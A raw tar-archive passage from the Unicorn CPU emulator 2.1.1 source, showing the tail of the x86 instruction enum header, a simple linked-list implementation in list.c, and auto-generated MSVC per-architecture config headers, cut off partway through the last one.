UC_X86_INS_VMOVNTPS, UC_X86_INS_VMOVSD, UC_X86_INS_VMOVSHDUP, UC_X86_INS_VMOVSLDUP, UC_X86_INS_VMOVSS, UC_X86_INS_VMOVUPD, UC_X86_INS_VMOVUPS, UC_X86_INS_VMPSADBW, UC_X86_INS_VMPTRLD, UC_X86_INS_VMPTRST, UC_X86_INS_VMREAD, UC_X86_INS_VMRESUME, UC_X86_INS_VMRUN, UC_X86_INS_VMSAVE, UC_X86_INS_VMULPD, UC_X86_INS_VMULPS, UC_X86_INS_VMULSD, UC_X86_INS_VMULSS, UC_X86_INS_VMWRITE, UC_X86_INS_VMXOFF, UC_X86_INS_VMXON, UC_X86_INS_VPABSB, UC_X86_INS_VPABSD, UC_X86_INS_VPABSQ, UC_X86_INS_VPABSW, UC_X86_INS_VPACKSSDW, UC_X86_INS_VPACKSSWB, UC_X86_INS_VPACKUSDW, UC_X86_INS_VPACKUSWB, UC_X86_INS_VPADDB, UC_X86_INS_VPADDD, UC_X86_INS_VPADDQ, UC_X86_INS_VPADDSB, UC_X86_INS_VPADDSW, UC_X86_INS_VPADDUSB, UC_X86_INS_VPADDUSW, UC_X86_INS_VPADDW, UC_X86_INS_VPALIGNR, UC_X86_INS_VPANDD, UC_X86_INS_VPANDND, UC_X86_INS_VPANDNQ, UC_X86_INS_VPANDN, UC_X86_INS_VPANDQ, UC_X86_INS_VPAND, UC_X86_INS_VPAVGB, UC_X86_INS_VPAVGW, UC_X86_INS_VPBLENDD, UC_X86_INS_VPBLENDMB, UC_X86_INS_VPBLENDMD, UC_X86_INS_VPBLENDMQ, UC_X86_INS_VPBLENDMW, UC_X86_INS_VPBLENDVB, UC_X86_INS_VPBLENDW, UC_X86_INS_VPBROADCASTB, UC_X86_INS_VPBROADCASTD, UC_X86_INS_VPBROADCASTMB2Q, UC_X86_INS_VPBROADCASTMW2D, UC_X86_INS_VPBROADCASTQ, UC_X86_INS_VPBROADCASTW, UC_X86_INS_VPCLMULQDQ, UC_X86_INS_VPCMOV, UC_X86_INS_VPCMPB, UC_X86_INS_VPCMPD, UC_X86_INS_VPCMPEQB, UC_X86_INS_VPCMPEQD, UC_X86_INS_VPCMPEQQ, UC_X86_INS_VPCMPEQW, UC_X86_INS_VPCMPESTRI, UC_X86_INS_VPCMPESTRM, UC_X86_INS_VPCMPGTB, UC_X86_INS_VPCMPGTD, UC_X86_INS_VPCMPGTQ, UC_X86_INS_VPCMPGTW, UC_X86_INS_VPCMPISTRI, UC_X86_INS_VPCMPISTRM, UC_X86_INS_VPCMPQ, UC_X86_INS_VPCMPUB, UC_X86_INS_VPCMPUD, UC_X86_INS_VPCMPUQ, UC_X86_INS_VPCMPUW, UC_X86_INS_VPCMPW, UC_X86_INS_VPCOMB, UC_X86_INS_VPCOMD, UC_X86_INS_VPCOMPRESSD, UC_X86_INS_VPCOMPRESSQ, UC_X86_INS_VPCOMQ, UC_X86_INS_VPCOMUB, UC_X86_INS_VPCOMUD, UC_X86_INS_VPCOMUQ, UC_X86_INS_VPCOMUW, UC_X86_INS_VPCOMW, UC_X86_INS_VPCONFLICTD, UC_X86_INS_VPCONFLICTQ, UC_X86_INS_VPERM2F128, UC_X86_INS_VPERM2I128, UC_X86_INS_VPERMD, UC_X86_INS_VPERMI2D, UC_X86_INS_VPERMI2PD, UC_X86_INS_VPERMI2PS, UC_X86_INS_VPERMI2Q, UC_X86_INS_VPERMIL2PD, UC_X86_INS_VPERMIL2PS, UC_X86_INS_VPERMILPD, UC_X86_INS_VPERMILPS, UC_X86_INS_VPERMPD, UC_X86_INS_VPERMPS, UC_X86_INS_VPERMQ, UC_X86_INS_VPERMT2D, UC_X86_INS_VPERMT2PD, UC_X86_INS_VPERMT2PS, UC_X86_INS_VPERMT2Q, UC_X86_INS_VPEXPANDD, UC_X86_INS_VPEXPANDQ, UC_X86_INS_VPEXTRB, UC_X86_INS_VPEXTRD, UC_X86_INS_VPEXTRQ, UC_X86_INS_VPEXTRW, UC_X86_INS_VPGATHERDD, UC_X86_INS_VPGATHERDQ, UC_X86_INS_VPGATHERQD, UC_X86_INS_VPGATHERQQ, UC_X86_INS_VPHADDBD, UC_X86_INS_VPHADDBQ, UC_X86_INS_VPHADDBW, UC_X86_INS_VPHADDDQ, UC_X86_INS_VPHADDD, UC_X86_INS_VPHADDSW, UC_X86_INS_VPHADDUBD, UC_X86_INS_VPHADDUBQ, UC_X86_INS_VPHADDUBW, UC_X86_INS_VPHADDUDQ, UC_X86_INS_VPHADDUWD, UC_X86_INS_VPHADDUWQ, UC_X86_INS_VPHADDWD, UC_X86_INS_VPHADDWQ, UC_X86_INS_VPHADDW, UC_X86_INS_VPHMINPOSUW, UC_X86_INS_VPHSUBBW, UC_X86_INS_VPHSUBDQ, UC_X86_INS_VPHSUBD, UC_X86_INS_VPHSUBSW, UC_X86_INS_VPHSUBWD, UC_X86_INS_VPHSUBW, UC_X86_INS_VPINSRB, UC_X86_INS_VPINSRD, UC_X86_INS_VPINSRQ, UC_X86_INS_VPINSRW, UC_X86_INS_VPLZCNTD, UC_X86_INS_VPLZCNTQ, UC_X86_INS_VPMACSDD, UC_X86_INS_VPMACSDQH, UC_X86_INS_VPMACSDQL, UC_X86_INS_VPMACSSDD, UC_X86_INS_VPMACSSDQH, UC_X86_INS_VPMACSSDQL, UC_X86_INS_VPMACSSWD, UC_X86_INS_VPMACSSWW, UC_X86_INS_VPMACSWD, UC_X86_INS_VPMACSWW, UC_X86_INS_VPMADCSSWD, UC_X86_INS_VPMADCSWD, UC_X86_INS_VPMADDUBSW, UC_X86_INS_VPMADDWD, UC_X86_INS_VPMASKMOVD, UC_X86_INS_VPMASKMOVQ, UC_X86_INS_VPMAXSB, UC_X86_INS_VPMAXSD, UC_X86_INS_VPMAXSQ, UC_X86_INS_VPMAXSW, UC_X86_INS_VPMAXUB, UC_X86_INS_VPMAXUD, UC_X86_INS_VPMAXUQ, UC_X86_INS_VPMAXUW, UC_X86_INS_VPMINSB, UC_X86_INS_VPMINSD, UC_X86_INS_VPMINSQ, UC_X86_INS_VPMINSW, UC_X86_INS_VPMINUB, UC_X86_INS_VPMINUD, UC_X86_INS_VPMINUQ, UC_X86_INS_VPMINUW, UC_X86_INS_VPMOVDB, UC_X86_INS_VPMOVDW, UC_X86_INS_VPMOVM2B, UC_X86_INS_VPMOVM2D, UC_X86_INS_VPMOVM2Q, UC_X86_INS_VPMOVM2W, UC_X86_INS_VPMOVMSKB, UC_X86_INS_VPMOVQB, UC_X86_INS_VPMOVQD, UC_X86_INS_VPMOVQW, UC_X86_INS_VPMOVSDB, UC_X86_INS_VPMOVSDW, UC_X86_INS_VPMOVSQB, UC_X86_INS_VPMOVSQD, UC_X86_INS_VPMOVSQW, UC_X86_INS_VPMOVSXBD, UC_X86_INS_VPMOVSXBQ, UC_X86_INS_VPMOVSXBW, UC_X86_INS_VPMOVSXDQ, UC_X86_INS_VPMOVSXWD, UC_X86_INS_VPMOVSXWQ, UC_X86_INS_VPMOVUSDB, UC_X86_INS_VPMOVUSDW, UC_X86_INS_VPMOVUSQB, UC_X86_INS_VPMOVUSQD, UC_X86_INS_VPMOVUSQW, UC_X86_INS_VPMOVZXBD, UC_X86_INS_VPMOVZXBQ, UC_X86_INS_VPMOVZXBW, UC_X86_INS_VPMOVZXDQ, UC_X86_INS_VPMOVZXWD, UC_X86_INS_VPMOVZXWQ, UC_X86_INS_VPMULDQ, UC_X86_INS_VPMULHRSW, UC_X86_INS_VPMULHUW, UC_X86_INS_VPMULHW, UC_X86_INS_VPMULLD, UC_X86_INS_VPMULLQ, UC_X86_INS_VPMULLW, UC_X86_INS_VPMULUDQ, UC_X86_INS_VPORD, UC_X86_INS_VPORQ, UC_X86_INS_VPOR, UC_X86_INS_VPPERM, UC_X86_INS_VPROTB, UC_X86_INS_VPROTD, UC_X86_INS_VPROTQ, UC_X86_INS_VPROTW, UC_X86_INS_VPSADBW, UC_X86_INS_VPSCATTERDD, UC_X86_INS_VPSCATTERDQ, UC_X86_INS_VPSCATTERQD, UC_X86_INS_VPSCATTERQQ, UC_X86_INS_VPSHAB, UC_X86_INS_VPSHAD, UC_X86_INS_VPSHAQ, UC_X86_INS_VPSHAW, UC_X86_INS_VPSHLB, UC_X86_INS_VPSHLD, UC_X86_INS_VPSHLQ, UC_X86_INS_VPSHLW, UC_X86_INS_VPSHUFB, UC_X86_INS_VPSHUFD, UC_X86_INS_VPSHUFHW, UC_X86_INS_VPSHUFLW, UC_X86_INS_VPSIGNB, UC_X86_INS_VPSIGND, UC_X86_INS_VPSIGNW, UC_X86_INS_VPSLLDQ, UC_X86_INS_VPSLLD, UC_X86_INS_VPSLLQ, UC_X86_INS_VPSLLVD, UC_X86_INS_VPSLLVQ, UC_X86_INS_VPSLLW, UC_X86_INS_VPSRAD, UC_X86_INS_VPSRAQ, UC_X86_INS_VPSRAVD, UC_X86_INS_VPSRAVQ, UC_X86_INS_VPSRAW, UC_X86_INS_VPSRLDQ, UC_X86_INS_VPSRLD, UC_X86_INS_VPSRLQ, UC_X86_INS_VPSRLVD, UC_X86_INS_VPSRLVQ, UC_X86_INS_VPSRLW, UC_X86_INS_VPSUBB, UC_X86_INS_VPSUBD, UC_X86_INS_VPSUBQ, UC_X86_INS_VPSUBSB, UC_X86_INS_VPSUBSW, UC_X86_INS_VPSUBUSB, UC_X86_INS_VPSUBUSW, UC_X86_INS_VPSUBW, UC_X86_INS_VPTESTMD, UC_X86_INS_VPTESTMQ, UC_X86_INS_VPTESTNMD, UC_X86_INS_VPTESTNMQ, UC_X86_INS_VPTEST, UC_X86_INS_VPUNPCKHBW, UC_X86_INS_VPUNPCKHDQ, UC_X86_INS_VPUNPCKHQDQ, UC_X86_INS_VPUNPCKHWD, UC_X86_INS_VPUNPCKLBW, UC_X86_INS_VPUNPCKLDQ, UC_X86_INS_VPUNPCKLQDQ, UC_X86_INS_VPUNPCKLWD, UC_X86_INS_VPXORD, UC_X86_INS_VPXORQ, UC_X86_INS_VPXOR, UC_X86_INS_VRCP14PD, UC_X86_INS_VRCP14PS, UC_X86_INS_VRCP14SD, UC_X86_INS_VRCP14SS, UC_X86_INS_VRCP28PD, UC_X86_INS_VRCP28PS, UC_X86_INS_VRCP28SD, UC_X86_INS_VRCP28SS, UC_X86_INS_VRCPPS, UC_X86_INS_VRCPSS, UC_X86_INS_VRNDSCALEPD, UC_X86_INS_VRNDSCALEPS, UC_X86_INS_VRNDSCALESD, UC_X86_INS_VRNDSCALESS, UC_X86_INS_VROUNDPD, UC_X86_INS_VROUNDPS, UC_X86_INS_VROUNDSD, UC_X86_INS_VROUNDSS, UC_X86_INS_VRSQRT14PD, UC_X86_INS_VRSQRT14PS, UC_X86_INS_VRSQRT14SD, UC_X86_INS_VRSQRT14SS, UC_X86_INS_VRSQRT28PD, UC_X86_INS_VRSQRT28PS, UC_X86_INS_VRSQRT28SD, UC_X86_INS_VRSQRT28SS, UC_X86_INS_VRSQRTPS, UC_X86_INS_VRSQRTSS, UC_X86_INS_VSCATTERDPD, UC_X86_INS_VSCATTERDPS, UC_X86_INS_VSCATTERPF0DPD, UC_X86_INS_VSCATTERPF0DPS, UC_X86_INS_VSCATTERPF0QPD, UC_X86_INS_VSCATTERPF0QPS, UC_X86_INS_VSCATTERPF1DPD, UC_X86_INS_VSCATTERPF1DPS, UC_X86_INS_VSCATTERPF1QPD, UC_X86_INS_VSCATTERPF1QPS, UC_X86_INS_VSCATTERQPD, UC_X86_INS_VSCATTERQPS, UC_X86_INS_VSHUFPD, UC_X86_INS_VSHUFPS, UC_X86_INS_VSQRTPD, UC_X86_INS_VSQRTPS, UC_X86_INS_VSQRTSD, UC_X86_INS_VSQRTSS, UC_X86_INS_VSTMXCSR, UC_X86_INS_VSUBPD, UC_X86_INS_VSUBPS, UC_X86_INS_VSUBSD, UC_X86_INS_VSUBSS, UC_X86_INS_VTESTPD, UC_X86_INS_VTESTPS, UC_X86_INS_VUNPCKHPD, UC_X86_INS_VUNPCKHPS, UC_X86_INS_VUNPCKLPD, UC_X86_INS_VUNPCKLPS, UC_X86_INS_VZEROALL, UC_X86_INS_VZEROUPPER, UC_X86_INS_WAIT, UC_X86_INS_WBINVD, UC_X86_INS_WRFSBASE, UC_X86_INS_WRGSBASE, UC_X86_INS_WRMSR, UC_X86_INS_XABORT, UC_X86_INS_XACQUIRE, UC_X86_INS_XBEGIN, UC_X86_INS_XCHG, UC_X86_INS_XCRYPTCBC, UC_X86_INS_XCRYPTCFB, UC_X86_INS_XCRYPTCTR, UC_X86_INS_XCRYPTECB, UC_X86_INS_XCRYPTOFB, UC_X86_INS_XEND, UC_X86_INS_XGETBV, UC_X86_INS_XLATB, UC_X86_INS_XRELEASE, UC_X86_INS_XRSTOR, UC_X86_INS_XRSTOR64, UC_X86_INS_XRSTORS, UC_X86_INS_XRSTORS64, UC_X86_INS_XSAVE, UC_X86_INS_XSAVE64, UC_X86_INS_XSAVEC, UC_X86_INS_XSAVEC64, UC_X86_INS_XSAVEOPT, UC_X86_INS_XSAVEOPT64, UC_X86_INS_XSAVES, UC_X86_INS_XSAVES64, UC_X86_INS_XSETBV, UC_X86_INS_XSHA1, UC_X86_INS_XSHA256, UC_X86_INS_XSTORE, UC_X86_INS_XTEST, UC_X86_INS_FDISI8087_NOP, UC_X86_INS_FENI8087_NOP, UC_X86_INS_ENDING, // mark the end of the list of insn } uc_x86_insn; #ifdef __cplusplus } #endif #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/list.c��������������������������������������������������������������������������������0000664�0000000�0000000�00000005123�14675241067�0014324�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <stdlib.h> #include "unicorn/platform.h" #include "list.h" // simple linked list implementation struct list *list_new(void) { return calloc(1, sizeof(struct list)); } // removed linked list nodes but does not free their content void list_clear(struct list *list) { struct list_item *next, *cur = list->head; while (cur != NULL) { next = cur->next; if (list->delete_fn) { list->delete_fn(cur->data); } free(cur); cur = next; } list->head = NULL; list->tail = NULL; } // insert a new item at the begin of the list. // returns generated linked list node, or NULL on failure void *list_insert(struct list *list, void *data) { struct list_item *item = malloc(sizeof(struct list_item)); if (item == NULL) { return NULL; } item->data = data; item->next = list->head; if (list->tail == NULL) { list->tail = item; } list->head = item; return item; } // append a new item at the end of the list. // returns generated linked list node, or NULL on failure void *list_append(struct list *list, void *data) { struct list_item *item = malloc(sizeof(struct list_item)); if (item == NULL) { return NULL; } item->next = NULL; item->data = data; if (list->head == NULL) { list->head = item; } else { list->tail->next = item; } list->tail = item; return item; } // returns true if entry was removed, false otherwise bool list_remove(struct list *list, void *data) { struct list_item *next, *cur, *prev = NULL; // is list empty? if (list->head == NULL) { return false; } cur = list->head; while (cur != NULL) { next = cur->next; if (cur->data == data) { if (cur == list->head) { list->head = next; } else { prev->next = next; } if (cur == list->tail) { list->tail = prev; } if (list->delete_fn) { list->delete_fn(cur->data); } free(cur); return true; } prev = cur; cur = next; } return false; } // returns true if the data exists in the list bool list_exists(struct list *list, void *data) { struct list_item *next, *cur = NULL; // is list empty? if (list->head == NULL) { return false; } cur = list->head; while (cur != NULL) { next = cur->next; if (cur->data == data) { return true; } cur = next; } return false; }���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/���������������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0014154�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/aarch64-softmmu/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017074�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/aarch64-softmmu/config-target.h��������������������������������������������������0000664�0000000�0000000�00000000244�14675241067�0021776�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_AARCH64 1 #define TARGET_NAME "aarch64" #define TARGET_ARM 1 #define CONFIG_SOFTMMU 1 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/aarch64eb-softmmu/���������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017403�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/aarch64eb-softmmu/config-target.h������������������������������������������������0000664�0000000�0000000�00000000307�14675241067�0022305�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_AARCH64 1 #define TARGET_NAME "aarch64eb" #define TARGET_ARM 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/arm-softmmu/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016423�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/arm-softmmu/config-target.h������������������������������������������������������0000664�0000000�0000000�00000000234�14675241067�0021324�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ARM 1 #define TARGET_NAME "arm" #define TARGET_ARM 1 #define CONFIG_SOFTMMU 1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/armeb-softmmu/�������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016732�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/armeb-softmmu/config-target.h����������������������������������������������������0000664�0000000�0000000�00000000277�14675241067�0021642�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ARM 1 #define TARGET_NAME "armeb" #define TARGET_ARM 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/config-host.h��������������������������������������������������������������������0000664�0000000�0000000�00000000404�14675241067�0016543�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define HOST_I386 1 #define CONFIG_WIN32 1 #define CONFIG_TCG 1 #define CONFIG_CPUID_H 1 // #define CONFIG_INT128 1 #define CONFIG_CMPXCHG128 1 // #define CONFIG_ATOMIC64 1 #define CONFIG_PLUGIN 1 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/m68k-softmmu/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016431�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/m68k-softmmu/config-target.h�����������������������������������������������������0000664�0000000�0000000�00000000300�14675241067�0021324�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_M68K 1 #define TARGET_NAME "m68k" #define TARGET_M68K 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips-softmmu/��������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016614�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips-softmmu/config-target.h�����������������������������������������������������0000664�0000000�0000000�00000000335�14675241067�0021517�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ABI_MIPSO32 1 #define TARGET_MIPS 1 #define TARGET_NAME "mips" #define TARGET_MIPS 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips64-softmmu/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016766�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips64-softmmu/config-target.h���������������������������������������������������0000664�0000000�0000000�00000000341�14675241067�0021666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ABI_MIPSN64 1 #define TARGET_MIPS64 1 #define TARGET_NAME "mips64" #define TARGET_MIPS 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips64el-softmmu/����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017307�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mips64el-softmmu/config-target.h�������������������������������������������������0000664�0000000�0000000�00000000302�14675241067�0022204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ABI_MIPSN64 1 #define TARGET_MIPS64 1 #define TARGET_NAME "mips64el" #define TARGET_MIPS 1 #define CONFIG_SOFTMMU 1 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mipsel-softmmu/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017135�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/mipsel-softmmu/config-target.h���������������������������������������������������0000664�0000000�0000000�00000000276�14675241067�0022044�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_ABI_MIPSO32 1 #define TARGET_MIPS 1 #define TARGET_NAME "mipsel" #define TARGET_MIPS 1 #define CONFIG_SOFTMMU 1 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/ppc-softmmu/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016426�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/ppc-softmmu/config-target.h������������������������������������������������������0000664�0000000�0000000�00000000275�14675241067�0021334�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_PPC 1 #define TARGET_NAME "ppc" #define TARGET_PPC 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/ppc64-softmmu/�������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016600�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/ppc64-softmmu/config-target.h����������������������������������������������������0000664�0000000�0000000�00000000301�14675241067�0021474�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_PPC64 1 #define TARGET_NAME "ppc64" #define TARGET_PPC 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/riscv32-softmmu/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017137�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/riscv32-softmmu/config-target.h��������������������������������������������������0000664�0000000�0000000�00000000306�14675241067�0022040�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_RISCV32 1 #define TARGET_NAME "riscv32" #define TARGET_RISCV 1 #define CONFIG_SOFTMMU 1 #define TARGET_SUPPORTS_MTTCG 1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/riscv64-softmmu/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017144�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/riscv64-softmmu/config-target.h��������������������������������������������������0000664�0000000�0000000�00000000306�14675241067�0022045�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_RISCV64 1 #define TARGET_NAME "riscv64" #define TARGET_RISCV 1 #define CONFIG_SOFTMMU 1 #define TARGET_SUPPORTS_MTTCG 1 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/s390x-softmmu/�������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016532�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/s390x-softmmu/config-target.h����������������������������������������������������0000664�0000000�0000000�00000000407�14675241067�0021435�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_S390X 1 #define TARGET_NAME "s390x" #define TARGET_S390X 1 #define TARGET_SYSTBL_ABI common,64 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 #define TARGET_SUPPORTS_MTTCG 1 ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/sparc-softmmu/�������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016754�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/sparc-softmmu/config-target.h����������������������������������������������������0000664�0000000�0000000�00000000303�14675241067�0021652�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_SPARC 1 #define TARGET_NAME "sparc" #define TARGET_SPARC 1 #define TARGET_WORDS_BIGENDIAN 1 #define CONFIG_SOFTMMU 1 �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/sparc64-softmmu/�����������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017126�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/msvc/sparc64-softmmu/config-target.h��������������������������������������������������0000664�0000000�0000000�00000000307�14675241067�0022030�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Automatically generated by create_config - do not modify */ #define TARGET_SPARC64 1 #define TARGET_NAME "sparc64" #define TARGET_SPARC 1 #define 